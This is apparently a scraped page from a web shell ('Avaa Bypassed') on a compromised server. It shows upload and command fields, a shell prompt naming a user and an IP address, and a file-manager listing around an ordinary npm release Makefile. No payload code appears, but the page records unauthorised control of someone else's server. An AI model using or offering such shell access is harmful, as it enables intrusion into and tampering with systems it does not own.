404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.216.78.8: ~ $
SHELL := /bin/bash

release-major: test
	npm version major -m "Release %s"
	git push
	npm publish

release-minor: test
	npm version minor -m "Release %s"
	git push
	npm publish

release-patch: test
	npm version patch -m "Release %s"
	git push
	npm publish

.PHONY: test release-major release-minor release-patch

Filemanager

Name Type Size Permission Actions
example Folder 0755
lib Folder 0755
License File 1.11 KB 0644
Makefile File 312 B 0644
equation.gif File 1.18 KB 0644
index.js File 40 B 0644
package.json File 1022 B 0644